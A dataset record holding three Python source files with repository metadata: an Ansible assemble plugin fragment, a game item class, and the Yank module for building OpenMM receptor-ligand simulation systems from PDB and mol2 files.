'regexp', 'delimiter', 'ignore_hidden']: if opt in new_module_args: del new_module_args[opt] new_module_args.update( dict( dest=dest, original_basename=os.path.basename(src), ) ) if path_checksum != dest_stat['checksum']: if self._play_context.diff: diff = self._get_diff_data(dest, path, task_vars) remote_path = self._connection._shell.join_path(tmp, 'src') xfered = self._transfer_file(path, remote_path) # fix file permissions when the copy is done as a different user self._fixup_perms((tmp, remote_path), remote_user) new_module_args.update( dict( src=xfered,)) res = self._execute_module(module_name='copy', module_args=new_module_args, task_vars=task_vars, tmp=tmp, delete_remote_tmp=False) if diff: res['diff'] = diff result.update(res) else: result.update(self._execute_module(module_name='file', module_args=new_module_args, task_vars=task_vars, tmp=tmp, delete_remote_tmp=False)) self._remove_tmp_path(tmp) return result
ramondelafuente/ansible
lib/ansible/plugins/action/assemble.py
Python
gpl-3.0
6,337
[ "Brian" ]
261b1bc376a65de30503fbd75bcfb6a869127063b5f71878148f1ff70b2ecc0d
import src class GlassCrystal(src.items.Item): """ """ type = "GlassCrystal" name = "glass crystal" description = "a fraction of something bigger" walkable = True bolted = False def __init__(self): """ set up internal state """ super().__init__(display="++") def destroy(self, generateScrap=True): """ destroy without residue Parameters: generateScrap: flag to leave no residue """ super().destroy(generateScrap=False) src.items.addType(GlassCrystal)
MarxMustermann/OfMiceAndMechs
src/itemFolder/resources/glassCrystal.py
Python
gpl-3.0
579
[ "CRYSTAL" ]
47732277a161aaaa1021a1d8be8d1604b2083d5e045132361d40250574d7b3e8
#!/usr/bin/python #============================================================================================= # MODULE DOCSTRING #============================================================================================= """ Tools for constructing OpenMM System objects from various convenient input file formats. DESCRIPTION This module contains tools for constructing OpenMM System objects for receptor-ligand systems from various convenient input formats, and includes the ability to form models of complexes from individual receptor and ligand files. """ #============================================================================================= # GLOBAL DEFINITIONS #============================================================================================= __author__ = 'Patrick Grinaway' #============================================================================================= # GLOBAL IMPORTS #============================================================================================= import abc import copy import os, os.path import tempfile import numpy as np import simtk.openmm.app as app import simtk.unit as units #============================================================================================= # ABSTRACT BASE CLASS #============================================================================================= class SystemBuilder(object): """ Abstract base class for SystemBuilder classes. This is a base class for other classes that will create systems for use with Yank Only its children should use it. Several unimplemented methods must be overridden To be in a valid and consistent state, each subclass must have defined the following properties after initialization: _positions, _topology, _ffxmls Properties ---------- positions : simtk.openmm.Quantity with units compatible with nanometers, wrapping a numpy.array of natoms x 3 Atomic positions associated with the constructed System object. topology : simtk.openmm.app.Topology OpenMM Topology specifying system. system : simtk.openmm.System The OpenMM System object created by this SystemBuilder. natoms : int The number of atoms in the system. ffxmls : list of str List of OpenMM ForceField ffxml file contents used to parameterize this System. system_creation_parameters : dict of str Key-value pairs passed to ForceField.createSystem() when system is created. TODO: * Make system_creation_parameters private and use setter/getters that only allow changes to dict before self._system has been created. """ __metaclass__ = abc.ABCMeta def __init__(self, ffxml_filenames=None, ffxmls=None, system_creation_parameters=dict(), molecule_name="MOL"): """ Abstract base class for SystemBuilder classes. Parameters ---------- ffxml_filenames : list of str, optional, default=None List of OpenMM ForceField ffxml filenames (relative or absolute) used to parameterize the System. ffxmls : list of str, optional, default=None List of ffxml file contents used to parameterize the System. system_creation_parameters : dict of str, optional, default=None If specified, these key-value parameters are used in the creation of the System object via ForceField.createSystem(). If None, an empty dict is used. """ if ffxmls is None: ffxmls = set() # empty set # Set private class properties. self._ffxmls = ffxmls # Start with contents of any specified ffxml files. self._append_ffxmls(ffxml_filenames) # Append contents of any ffxml files to be read. self._molecule_name = molecule_name # Optional molecule name self._topology = None # OpenMM Topology object self._positions = None # OpenMM positions as simtk.unit.Quantity with units compatible with nanometers self._system = None # OpenMM System object created by ForceField self.system_creation_parameters = system_creation_parameters # dictionary of parameters passed to ForceField.createSystem() return def _read_ffxml(self, ffxml_filename): """ Read the contents of the specified ffxml file, using relative or absolute paths. Parameters ---------- ffxml_filename : str An XML file defining the force field. Each entry may be an absolute file path, a path relative to the current working directory, or a path relative to this module's data subdirectory (for built in force fields). TODO: * Also try append .xml or .ffxml extensions. """ try: infile = open(ffxml_filename, 'r') except IOError: from simtk.openmm.app import forcefield forcefield_data_dir = os.path.join(os.path.dirname(app.forcefield.__file__), 'data') fullpath = os.path.join(forcefield_data_dir, ffxml_filename) infile = open(fullpath, 'r') ffxml = infile.read() infile.close() return ffxml def _append_ffxmls(self, ffxml_filenames): """ Read specified ffxml files and append to internal _ffxml structure. Parameters ---------- ffxml_filenames : list of str A list of XML files defining the force field. Each entry may be an absolute file path, a path relative to the current working directory, or a path relative to this module's data subdirectory (for built in force fields). """ if ffxml_filenames: for ffxml_filename in ffxml_filenames: ffxml = self._read_ffxml(ffxml_filename) self._ffxmls.add(ffxml) return def _create_system(self): """ Create the OpenMM System object. """ # Create file-like objects from ffxml contents because ForceField cannot yet read strings. from StringIO import StringIO ffxml_streams = list() for ffxml in self._ffxmls: ffxml_streams.append(StringIO(ffxml)) # Create ForceField. forcefield = app.ForceField(*ffxml_streams) # Create System from topology. self._system = forcefield.createSystem(self._topology, **self.system_creation_parameters) return @property def system(self): """ Return the SystemBuilder's simtk.openmm.System object. A deep copy is returned to avoid accidentally modifying these objects. """ if self._system is None: self._create_system() return self._system @property def natoms(self): """ Return the number of particles in this sytem. Returns ------- natoms : int The number of particles in this system. """ return len(self._positions) @property def topology(self): """ Return the SystemBuilder's OpenMM topology object. Returns ------- topology : simtk.openmm.app.Toplogy The topology object containing all atoms in the system. A deep copy is returned to avoid accidentally modifying these objects. """ return copy.deepcopy(self._topology) @property def positions(self): """ Return atomic positions in OpenMM format. Returns ------- positions : simtk.unit.Quantity with units compatible with nanometers, wrapping natoms x 3 numpy array Atomic positions. A deep copy is returned to avoid accidentally modifying these objects. """ return copy.deepcopy(self._positions) @property def forcefield(self): """ Return the associated ForceField object. Returns -------- forcefield : simtk.openmm.app.ForceField The ForceField object associated with this class. One is created if it does not yet exist. A deep copy is returned to avoid accidentally modifying these objects. """ return copy.deepcopy(self._forcefield) @property def ffxmls(self): """ Return the list of OpenMM forcefield definition (ffxml) files associated with this SystemBuilder object. Returns ------- ffxmls : list of str The list of OpenMM ffxml file contents associated with this object. A deep copy is returned to avoid accidentally modifying these objects. """ return copy.deepcopy(self._ffxmls) #============================================================================================= # ABSTRACT BIOPOLYMER SYSTEM BUILDER #============================================================================================= class BiopolymerSystemBuilder(SystemBuilder): """ Abstract base class for classes that will read biopolymers. """ __metaclass__ = abc.ABCMeta def __init__(self,ffxml_filenames=None): """ Abstract base class for classes that will read biopolymers. Parameters ---------- """ super(BiopolymerSystemBuilder, self).__init__(ffxml_filenames=ffxml_filenames) return #============================================================================================= # BIOPOLYMER SYSTEM BUILDER FOR PDB FILES #============================================================================================= class BiopolymerPDBSystemBuilder(BiopolymerSystemBuilder): """ BiopolymerPDBSystemBuilder: This class is a subclass of BiopolymerSystemBuilder, and uses a PDB file as input. Currently, it accepts proteins and uses PDBFixer to try to repair issues with the PDB file This class does not currently perform any parameterization. As such, failure to give it appropriate forcefield ffxml(s) will cause it to fail. """ def __init__(self, pdb_filename, chain_ids=None, ffxml_filenames=['amber99sbildn.xml'], pH=7.0): """ Create a biopolymer from a specified PDB file. Parameters ---------- pdb_filename : str PDB filename chain_ids : str, default=None List of chain IDs that should be kept (e.g. 'ACFG'), or None if all are kept. ffxml_filenames : list of str, default=None List of OpenMM ForceField ffxml files used to parameterize the System. pH : float, default 7.0 pH to be used in determining the protonation state of the biopolymer. Examples -------- Create a SystemBuilder for a PDB file. >> from openmmtools import testsystems >> receptor_pdb_filename = testsystems.get_data_filename("data/T4-lysozyme-L99A-implicit/receptor.pdb") >> receptor = BiopolymerPDBSystemBuilder(receptor_pdb_filename, pH=7.0) >> system = receptor.system >> positions = receptor.positions >> natoms = receptor.natoms """ # Call base constructor. super(BiopolymerPDBSystemBuilder, self).__init__(ffxml_filenames=ffxml_filenames) # Store the desired pH used to assign protonation states. self._pH = pH # Use PDBFixer to add missing atoms and residues and set protonation states appropriately. from pdbfixer import pdbfixer fixer = pdbfixer.PDBFixer(pdb_filename) fixer.findMissingResidues() fixer.findNonstandardResidues() fixer.replaceNonstandardResidues() fixer.findMissingAtoms() fixer.addMissingAtoms() fixer.removeHeterogens(True) fixer.addMissingHydrogens(self._pH) # Keep only the chains the user wants if chain_ids is not None: # TODO: Check correctness of this. n_chains = len(list(fixer.topology.chains())) chains_to_remove = np.setdiff1d(np.arange(n_chains), chain_ids) # TODO: Check if this is robust to weird chain orderings. fixer.removeChains(chains_to_remove) # Store OpenMM topology. self._topology = fixer.topology # Store OpenMM positions. self._positions = fixer.positions return @property def pH(self): """ The pH used to determine the protonation state of the biopolymer. Returns ------- pH : float The pH that was used to determine the protonation state. """ return self._pH #============================================================================================= # ABSTRACT BASE SMALL MOLECULE BUILDER #============================================================================================= class SmallMoleculeBuilder(SystemBuilder): """ Concrete base class for SystemBuilders that will handle small molecules given OpenMM positions and topology. Parameters may be created by an external tool, if specified. This version manages an internal OpenEye OEChem object for convenience. Other tools may be supported as well in the future. TODO: * Allow specification of charge assignment method. * Support additional small molecule parameterization methods (e.g. oeante, paramchem, ATB) """ # Loaded OpenEye modules oechem = None oeiupac = None oeomega = None oequacpac = None def __init__(self, molecule, parameterize='gaff2xml', parameterize_arguments=None, charge=None, molecule_name=None, **kwargs): """ SystemBuilder capable of parameterizing small molecules given OpenMM positions and topology. Parameters ---------- molecule : openeye.oechem.OEMol parameterize : str, optional, default='gaff2xml' External tool used to parameterize the molecule. One of [False, 'gaff2xml']. If False, tool will not be called. parameterize_arguments : dict, optional, default=None Dictionary to be passed to parameterization tool. charge : int, optional, default=None If specified, the appropriate charge state will be selected. **kwargs are passed to external parameterization tool """ # Load and license check for all necessary OpenEye libraries self._load_verify_openeye() # Call the constructor. super(SmallMoleculeBuilder, self).__init__(**kwargs) # Normalize the molecule. molecule = self._normalize_molecule(molecule) # Select the desired charge state, if one is specified. if charge is not None: # Enumerate protonation states and select desired state. protonation_states = self._enumerate_states(molecule, type_of_states="protonation") # Search through the states for desired charge for molecule in protonation_states: if self._formal_charge(molecule) == charge: break # Throw exception if we are unable to find desired charge. if self._formal_charge(molecule) != charge: print "enumerateStates did not enumerate a molecule with desired formal charge." print "Options are:" for molecule in protonation_states: print "%s, formal charge %d" % (molecule.GetTitle(), self._formal_charge(molecule)) raise RuntimeError("Could not find desired formal charge.") # Generate a 3D conformation if we don't have a 3-dimensional molecule. if molecule.GetDimension() < 3: molecule = self._expand_conformations(molecule, maxconfs=1) # Store OpenMM positions and topologies. [self._positions, self._topology] = self._oemol_to_openmm(molecule) # Parameterize if requested. if parameterize: if parameterize == 'gaff2xml': self._parameterize_with_gaff2xml(molecule, parameterize_arguments) return def _parameterize_with_gaff2xml(self, molecule, charge, parameterize_arguments=dict()): """ Parameterize the molecule using gaff2xml, appending the parameters to the set of loaded parameters. Parameters ---------- parameterize_arguments : dict, optional, default=None Optional kwargs to be passed to gaff2xml. """ # Attempt to import gaff2xml. import gaff2xml # Change to a temporary working directory. cwd = os.getcwd() tmpdir = tempfile.mkdtemp() os.chdir(tmpdir) # Write Tripos mol2 file. substructure_name = "MOL" # substructure name used in mol2 file mol2_filename = self._write_molecule(molecule, filename='tripos.mol2', substructure_name=substructure_name) # Run antechamber via gaff2xml to generate parameters. # TODO: We need a way to pass the net charge. # TODO: Can this structure be simplified? if 'charge_method' in parameterize_arguments: if 'net_charge' not in parameterize_arguments: # Specify formal charge. formal_charge = self._formal_charge(molecule) parameterize_arguments['net_charge'] = formal_charge if parameterize_arguments: (gaff_mol2_filename, gaff_frcmod_filename) = gaff2xml.utils.run_antechamber(self._molecule_name, mol2_filename, **parameterize_arguments) else: (gaff_mol2_filename, gaff_frcmod_filename) = gaff2xml.utils.run_antechamber(self._molecule_name, mol2_filename) # Write out the ffxml file from gaff2xml. ffxml_filename = "molecule.ffxml" print "tripos mol2 filename: %s" % mol2_filename # DEBUG print "gaff mol2 filename: %s" % gaff_mol2_filename # DEBUG print "gaff frcmod filename: %s" % gaff_frcmod_filename # DEBUG gaff2xml.utils.create_ffxml_file(gaff_mol2_filename, gaff_frcmod_filename, ffxml_filename) # Append the ffxml file to loaded parameters. self._append_ffxmls([ffxml_filename]) # Restore working directory. os.chdir(cwd) # Clean up temporary working directory. for filename in os.listdir(tmpdir): file_path = os.path.join(tmpdir, filename) try: if os.path.isfile(file_path): os.unlink(file_path) except Exception, e: print e return def _write_molecule(self, molecule, filename=None, format=None, preserve_atomtypes=False, substructure_name=None): """Write the given OpenEye molecule to a file. Parameters ---------- molecule : openeye.oechem.OEMol The molecule to be written to file (will notbe changed). filename : str, optional, default=None The name of the file to be written, or None if a temporary file is to be created. format : OEFormat, optional, default=None The format of the file to be written ( preserve_atomtypes : bool, optional, default=False If True, atom types will not be converted before writing. substructure_name : str, optional, default=None If specified, mol2 substructure name will be set to specified name. Returns ------- filename : str The name of the file written. """ if filename == None: file = tempfile.NamedTemporaryFile(delete=False) filename = file.name file.close() # close the file so we can open it again # Make a copy of the molecule so it will not be changed. molecule = self.oechem.OEMol(molecule) # Open the output stream ostream = self.oechem.oemolostream(filename) # Select the format. if format: ostream.SetFormat(format) # Define internal function for writing multiple conformers to an output stream. def write_all_conformers(ostream, molecule): # write all conformers of each molecule for conformer in molecule.GetConfs(): if preserve_atomtypes: self.oechem.OEWriteMol2File(ostream, conformer) else: self.oechem.OEWriteConstMolecule(ostream, conformer) return # If 'molecule' is actually a list of molecules, write them all. if type(molecule) == type(list()): for individual_molecule in molecule: write_all_conformers(ostream, individual_molecule) else: write_all_conformers(ostream, molecule) # Close the stream. ostream.close() # Modify substructure name if requested. if substructure_name: self._modify_substructure_name(filename, substructure_name) return filename def _modify_substructure_name(self, mol2file, name): """Replace the substructure name (subst_name) in a mol2 file. ARGUMENTS mol2file (string) - name of the mol2 file to modify name (string) - new substructure name NOTES This is useful becuase the OpenEye tools leave this name set to <0>. The transformation is only applied to the first molecule in the mol2 file. TODO This function is still difficult to read. It should be rewritten to be comprehensible by humans. Check again to see if there is OpenEye functionality to write the substructure name correctly. """ # Read mol2 file. file = open(mol2file, 'r') text = file.readlines() file.close() # Find the atom records. atomsec = [] ct = 0 while text[ct].find('<TRIPOS>ATOM')==-1: ct+=1 ct+=1 atomstart = ct while text[ct].find('<TRIPOS>BOND')==-1: ct+=1 atomend = ct atomsec = text[atomstart:atomend] outtext=text[0:atomstart] repltext = atomsec[0].split()[7] # mol2 file uses space delimited, not fixed-width # Replace substructure name. for line in atomsec: # If we blindly search and replace, we'll tend to clobber stuff, as the subst_name might be "1" or something lame like that that will occur all over. # If it only occurs once, just replace it. if line.count(repltext)==1: outtext.append( line.replace(repltext, name) ) else: # Otherwise grab the string left and right of the subst_name and sandwich the new subst_name in between. This can probably be done easier in Python 2.5 with partition, but 2.4 is still used someplaces. # Loop through the line and tag locations of every non-space entry blockstart=[] ct=0 c=' ' for ct in range(len(line)): lastc = c c = line[ct] if lastc.isspace() and not c.isspace(): blockstart.append(ct) line = line[0:blockstart[7]] + line[blockstart[7]:].replace(repltext, name, 1) outtext.append(line) # Append rest of file. for line in text[atomend:]: outtext.append(line) # Write out modified mol2 file, overwriting old one. file = open(mol2file,'w') file.writelines(outtext) file.close() return def _oemol_to_openmm(self, molecule): """Extract OpenMM positions and topologies from an OpenEye OEMol molecule. Parameters ---------- molecule : openeye.oechem.OEMol The molecule from which positions and topology are to be extracted. NOTE: This must be a Tripos format mol2 file, not a GAFF format file. Returns ------- positions : simtk.unit.Quantity with units compatible with nanometers, natoms x 3 The atomic positions. topology : simtk.openmm.app.Topology OpenMM Topology object for the small molecule. """ # Change to a temporary working directory. cwd = os.getcwd() tmpdir = tempfile.mkdtemp() os.chdir(tmpdir) # Write a Tripos mol2 file to a temporary file. substructure_name = "MOL" # substructure name used in mol2 file mol2_filename = 'molecule.mol2' self._write_molecule(molecule, filename=mol2_filename, substructure_name=substructure_name) # Read the mol2 file in MDTraj. import mdtraj mdtraj_molecule = mdtraj.load(mol2_filename) positions = mdtraj_molecule.openmm_positions(0) topology = mdtraj_molecule.top.to_openmm() # Restore working directory. os.chdir(cwd) # Clean up temporary working directory. for filename in os.listdir(tmpdir): file_path = os.path.join(tmpdir, filename) try: if os.path.isfile(file_path): os.unlink(file_path) except Exception, e: print e # Return OpenMM format positions and topology. return [positions, topology] def _normalize_molecule(self, molecule, set_name_to_iupac=True): """Normalize the molecule by checking aromaticity, adding explicit hydrogens, and renaming by IUPAC name. Parameters ---------- molecule : openeye.oechem.OEMol The molecule to be normalized. set_name_to_iupac : book, optional, default=True If True, the molecule title will be set to the IUPAC name. Returns ------- normalized_molecule : openeye.oechem.OEMol The normalized molecule. """ # Make a copy of the molecule. normalized_molecule = self.oechem.OEMol(molecule) # Find ring atoms and bonds self.oechem.OEFindRingAtomsAndBonds(normalized_molecule) # Assign aromaticity. self.oechem.OEAssignAromaticFlags(normalized_molecule, self.oechem.OEAroModelOpenEye) # Add hydrogens. self.oechem.OEAddExplicitHydrogens(normalized_molecule) if set_name_to_iupac: # Set title to IUPAC name. name = self.oeiupac.OECreateIUPACName(normalized_molecule) normalized_molecule.SetTitle(name) return normalized_molecule def _expand_conformations(self,molecule, maxconfs=None, threshold=None, include_original=False, torsionlib=None, verbose=False, strictTyping=None, strictStereo=True): """Enumerate conformations of the molecule with OpenEye's Omega after normalizing molecule. Parameters ---------- molecule : openeye.oechem.OEMol Molecule to enumerate conformations for. include_original (boolean) - if True, original conformation is included (default: False) maxconfs (integer) - if set to an integer, limits the maximum number of conformations to generated -- maximum of 120 (default: None) threshold (real) - threshold in RMSD (in Angstroms) for retaining conformers -- lower thresholds retain more conformers (default: None) torsionlib (string) - if a path to an Omega torsion library is given, this will be used instead (default: None) verbose (boolean) - if True, omega will print extra information strictTyping (boolean) -- if specified, pass option to SetStrictAtomTypes for Omega to control whether related MMFF types are allowed to be substituted for exact matches. strictStereo (boolean) -- if specified, pass option to SetStrictStereo; otherwise use default. Returns ------- expanded_molecule : openeye.oechem.OEMol Molecule with expanded conformations. """ # Copy molecule. expanded_molecule = self.openeye.oechem.OEMol(molecule) # Initialize Omega. omega = self.oeomega.OEOmega() if strictStereo != None: omega.SetStrictStereo(strictStereo) # Fail if stereochemistry is not specified. if strictTyping != None: omega.SetStrictAtomTypes(strictTyping) # Fail if any atom does not have a valid MMFF atom type. if include_original != None: omega.SetIncludeInput(include_original) # Include input if torsionlib != None: omega.SetTorsionLibrary(torsionlib) if maxconfs != None: omega.SetMaxConfs(maxconfs) # Return just one conformation. omega(expanded_molecule) # Generate conformation. return expanded_molecule def _formal_charge(self, molecule): """Find the net charge of a molecule. Parameters ---------- molecule : OEMol the molecule whose formal charge is to be determined Returns ------- int The formal charge of the molecule """ mol_copy = self.oechem.OEMol(molecule) self.oechem.OEFormalPartialCharges(mol_copy) return int(round(self.oechem.OENetCharge(mol_copy))) def _enumerate_states(self, molecules, type_of_states="protonation", consider_aromaticity=True, maxstates=200, verbose=False): """Enumerate protonation or tautomer states for a list of molecules. Parameters ---------- molecules : (OEMol or list of OEMol) molecule(s) for which states are to be enumerated type_of_states : str, optional type of states to expand -- 'protonation' or 'tautomer' (default: 'protonation') consider_aromaticity - bool, optional if True, aromaticity of the states will be evaluated. (default : True) verbose - bool, optional if True, will print out debug output (default : False) Returns ------- list of OEMol molecules in different protonation or tautomeric states """ # If 'molecules' is not a list, promote it to a list. if type(molecules) != type(list()): molecules = [molecules] # Check input arguments. if not ((type_of_states == "protonation") or (type_of_states == "tautomer")): raise "'enumerate' argument must be either 'protonation' or 'tautomer' -- instead got '%s'" % enumerate # Create an internal output stream to expand states into. ostream = self.oechem.oemolostream() ostream.openstring() ostream.SetFormat(self.oechem.OEFormat_SDF) # Default parameters. only_count_states = False # enumerate states, don't just count them # Enumerate states for each molecule in the input list. states_enumerated = 0 for molecule in molecules: if verbose: print "Enumerating states for molecule %s." % molecule.GetTitle() # Dump enumerated states to output stream (ostream). if type_of_states == "protonation": # Create a functor associated with the output stream. functor = self.oequacpac.OETyperMolFunction(ostream, consider_aromaticity, False, maxstates) # Enumerate protonation states. if verbose: print "Enumerating protonation states..." states_enumerated += self.oequacpac.OEEnumerateFormalCharges(molecule, functor, verbose) elif type_of_states == "tautomer": # Create a functor associated with the output stream. functor = self.oequacpac.OETautomerMolFunction(ostream, consider_aromaticity, False, maxstates) # TODO: deprecated # Enumerate tautomeric states. if verbose: print "Enumerating tautomer states..." states_enumerated += self.oequacpac.OEEnumerateTautomers(molecule, functor, verbose) if verbose: print "Enumerated a total of %d states." % states_enumerated # Collect molecules from output stream into a list. states = list() if states_enumerated > 0: state = self.oechem.OEMol() istream = self.oechem.oemolistream() istream.openstring(ostream.GetString()) istream.SetFormat(self.oechem.OEFormat_SDF) while self.oechem.OEReadMolecule(istream, state): states.append(self.oechem.OEMol(state)) # append a copy # Return the list of expanded states as a Python list of OEMol() molecules. return states def _load_verify_openeye(self, oechemlicensepath=None): """Loads required OpenEye libraries and checks licenses Parameters ---------- oechemlicensepath : str, optional, default=None OpenEye license path to use, or None if environment variables are to be used. Raises ------ RuntimeError If OE_LICENSE is not found as an environment variable If A valid license is missing Notes ----- Needs to be run before any of the other functions to assure OpenEye libraries are accessible. """ # Don't do anything if we've already imported OpenEye toolkit. if self.oechem: return try: # Import the OpenEye toolkit components. from openeye import oechem # For chemical objects from openeye import oeiupac # For IUPAC conversion from openeye import oeomega # For conformer generation from openeye import oequacpac # For pKa estimations except Exception as e: raise Exception("Could not import `openeye` library. Make sure OpenEye Python Toolkit is installed and on PYTHONPATH.") import os if oechemlicensepath is not None: os.environ['OE_LICENSE'] = oechemlicensepath try: os.environ['OE_LICENSE'] # See if license path is set. except KeyError: raise RuntimeError("Environment variable OE_LICENSE needs to be set.") if not oechem.OEChemIsLicensed(): # Check for OEchem TK license. raise RuntimeError("No valid license available for OEChem TK.") if not oeiupac.OEIUPACIsLicensed(): # Check for Lexichem TK license. raise RuntimeError("No valid license available for Lexichem TK.") if not oeomega.OEOmegaIsLicensed(): # Check for Omega TK license. raise RuntimeError("No valid license for Omega TK.") if not oequacpac.OEQuacPacIsLicensed(): # Check for Quacpac TK license. raise RuntimeError("No valid license for Quacpac TK.") #Attach libraries to the instance to only load and check them once at initialization. self.oechem = oechem self.oeiupac = oeiupac self.oeomega = oeomega self.oequacpac = oequacpac return #============================================================================================= # SMALL MOLECULE SYSTEM BUILDER FOR MOL2 FILES #============================================================================================= class Mol2SystemBuilder(SmallMoleculeBuilder): """ Create a system from a small molecule specified in a Tripos mol2 file. """ def __init__(self, mol2_filename, **kwargs): """ Create a system from a Tripos mol2 file. Parameters ---------- mol2_filename : str Small molecule coordinate file in Tripos mol2 format. Other arguments are inherited from SmallMoleculeSystemBuilder. Examples -------- Create a SystemBuilder from a ligand mol2 file, using default parameterization scheme. >> from openmmtools import testsystems >> ligand_mol2_filename = testsystems.get_data_filename("data/T4-lysozyme-L99A-implicit/ligand.tripos.mol2") >> ligand = Mol2SystemBuilder(ligand_mol2_filename, charge=0) >> system = ligand.system >> positions = ligand.positions >> natoms = ligand.natoms """ # Initialize the OpenEye toolkit. self._load_verify_openeye() # Open an input stream istream = self.oechem.oemolistream() istream.open(mol2_filename) # Prepare a molecule object molecule = self.oechem.OEMol() # Read the molecule self.oechem.OEReadMolecule(istream, molecule) # Close stream istream.close() # Initialize small molecule parameterization engine. super(Mol2SystemBuilder, self).__init__(molecule, **kwargs) return #============================================================================================= # SYSTEM BUILDER FOR COMBINING RECEPTOR AND LIGAND INTO A COMPLEX #============================================================================================= class ComplexSystemBuilder(SystemBuilder): def __init__(self, ligand, receptor, remove_ligand_overlap=False): """ Create a new SystemBuilder for a complex of a given ligand and receptor, keeping track of which atoms belong to which. Parameters ---------- ligand : SystemBuilder The SystemBuilder representing the ligand ligand : SystemBuilder The SystemBuilder representing the ligand remove_ligand_overlap : bool, optional, default=False If True, will translate ligand to not overlap with receptor atoms. Properties ---------- ligand_atoms : list of int List of atoms representing the ligand. receptor_atoms : list of int List of atoms representing the receptor. Examples -------- Create a ComplexSystemBuilder from a protein PDB file and a ligand mol2 file. >> from openmmtools import testsystems >> receptor_pdb_filename = testsystems.get_data_filename("data/T4-lysozyme-L99A-implicit/receptor.pdb") >> ligand_mol2_filename = testsystems.get_data_filename("data/T4-lysozyme-L99A-implicit/ligand.tripos.mol2") >> receptor = BiopolymerPDBSystemBuilder(receptor_pdb_filename, pH=7.0) >> ligand = Mol2SystemBuilder(ligand_mol2_filename, charge=0) >> complex = ComplexSystemBuilder(ligand, receptor, remove_ligand_overlap=True) >> system = complex.system >> positions = complex.positions >> ligand_atoms = complex.ligand_atoms >> receptor_atoms = complex.receptor_atoms >> natoms = complex.natoms """ # Call base class constructor. super(ComplexSystemBuilder, self).__init__() # Append ffxml files. self._ffxmls = list() self._ffxmls += receptor.ffxmls self._ffxmls += ligand.ffxmls # Concatenate topologies and positions. from simtk.openmm import app model = app.modeller.Modeller(receptor.topology, receptor.positions) model.add(ligand.topology, ligand.positions) self._topology = model.topology self._positions = model.positions # Store indices for receptor and ligand. self._receptor_atoms = range(receptor.natoms) self._ligand_atoms = range(receptor.natoms, receptor.natoms + ligand.natoms) # Modify ligand coordinates to not overlap with receptor. if remove_ligand_overlap: self._remove_ligand_overlap() return def _remove_ligand_overlap(self): """ Translate the ligand so that it is not overlapping with the receptor. Description ----------- The bounding sphere of the ligand and receptor are computed, and the ligand translated along the x-direction to not overlap with the protein. TODO: * This is not guaranteed to work for periodic systems. """ import mdtraj as md # Create an mdtraj Topology of the complex from OpenMM Topology object. mdtraj_complex_topology = md.Topology.from_openmm(self._topology) # Create an mdtraj instance of the complex. # TODO: Fix this when mdtraj can deal with OpenMM units. positions_in_mdtraj_format = np.array(self._positions / units.nanometers) mdtraj_complex = md.Trajectory(positions_in_mdtraj_format, mdtraj_complex_topology) # Compute centers of receptor and ligand. receptor_center = mdtraj_complex.xyz[0][self._receptor_atoms,:].mean(0) ligand_center = mdtraj_complex.xyz[0][self._ligand_atoms,:].mean(0) # Count number of receptor and ligand atoms. nreceptor_atoms = len(self._receptor_atoms) nligand_atoms = len(self._ligand_atoms) # Compute max radii of receptor and ligand. receptor_radius = (((mdtraj_complex.xyz[0][self._receptor_atoms,:] - np.tile(receptor_center, (nreceptor_atoms,1))) ** 2.).sum(1) ** 0.5).max() ligand_radius = (((mdtraj_complex.xyz[0][self._ligand_atoms,:] - np.tile(ligand_center, (nligand_atoms,1))) ** 2.).sum(1) ** 0.5).max() # Translate ligand along x-axis from receptor center with 5% clearance. mdtraj_complex.xyz[0][self._ligand_atoms,:] += np.array([1.0, 0.0, 0.0]) * (receptor_radius + ligand_radius) * 1.05 - ligand_center + receptor_center # Extract updated system positions. self._positions = mdtraj_complex.openmm_positions(0) return @property def ligand_atoms(self): return copy.deepcopy(self._ligand_atoms) @property def receptor_atoms(self): return copy.deepcopy(self._receptor_atoms) #============================================================================================= # TEST CODE #============================================================================================= def test_alchemy(): import os import simtk.unit as unit import simtk.openmm as openmm import numpy as np import simtk.openmm.app as app import alchemy # Create SystemBuilder objects. from openmmtools import testsystems receptor_pdb_filename = testsystems.get_data_filename("data/T4-lysozyme-L99A-implicit/receptor.pdb") ligand_mol2_filename = testsystems.get_data_filename("data/T4-lysozyme-L99A-implicit/ligand.tripos.mol2") receptor = BiopolymerPDBSystemBuilder(receptor_pdb_filename, pH=7.0) ligand = Mol2SystemBuilder(ligand_mol2_filename, charge=0) complex = ComplexSystemBuilder(ligand, receptor, remove_ligand_overlap=True) timestep = 2 * unit.femtoseconds # timestep temperature = 300.0 * unit.kelvin # simulation temperature collision_rate = 20.0 / unit.picoseconds # Langevin collision rate minimization_tolerance = 10.0 * unit.kilojoules_per_mole / unit.nanometer minimization_steps = 20 plat = "CPU" i=2 platform = openmm.Platform.getPlatformByName(plat) forcefield = app.ForceField systembuilders = [ligand, receptor, complex] receptor_atoms = complex.receptor_atoms ligand_atoms = complex.ligand_atoms factory = alchemy.AbsoluteAlchemicalFactory(systembuilders[i].system, ligand_atoms=ligand_atoms) protocol = factory.defaultComplexProtocolImplicit() systems = factory.createPerturbedSystems(protocol) integrator_interacting = openmm.LangevinIntegrator(temperature, collision_rate, timestep) #test an alchemical intermediate and an unperturbed system: fully_interacting = app.Simulation(systembuilders[i].topology, systems[0], integrator_interacting, platform=plat) fully_interacting.context.setPositions(systembuilders[i].positions) fully_interacting.minimizeEnergy(tolerance=10*unit.kilojoule_per_mole) fully_interacting.reporters.append(app.PDBReporter('fully_interacting.pdb', 10)) for j in range(10): print str(j) fully_interacting.step(100) del fully_interacting for p in range(1, len(systems)): print "now simulating " + str(p) integrator_partialinteracting = openmm.LangevinIntegrator(temperature, collision_rate, timestep) partially_interacting = app.Simulation(systembuilders[i].topology, systems[p], integrator_partialinteracting, platform=plat) partially_interacting.context.setPositions(systembuilders[i].positions) partially_interacting.minimizeEnergy(tolerance=10*unit.kilojoule_per_mole) partially_interacting.reporters.append(app.PDBReporter('partial_interacting'+str(p)+'.pdb', 10)) for k in range(10): print str(k) partially_interacting.step(100) del partially_interacting #============================================================================================= # MAIN AND TESTS #============================================================================================= if __name__ == "__main__": # Run doctests. import doctest doctest.testmod() # Run test. test_alchemy()
luirink/yank
Yank/systembuilder.py
Python
lgpl-3.0
44,764
[ "MDTraj", "OpenMM" ]
98e90d9c73f510e8c1454119a7a741170373441a3c96662822249bd93fc60be6
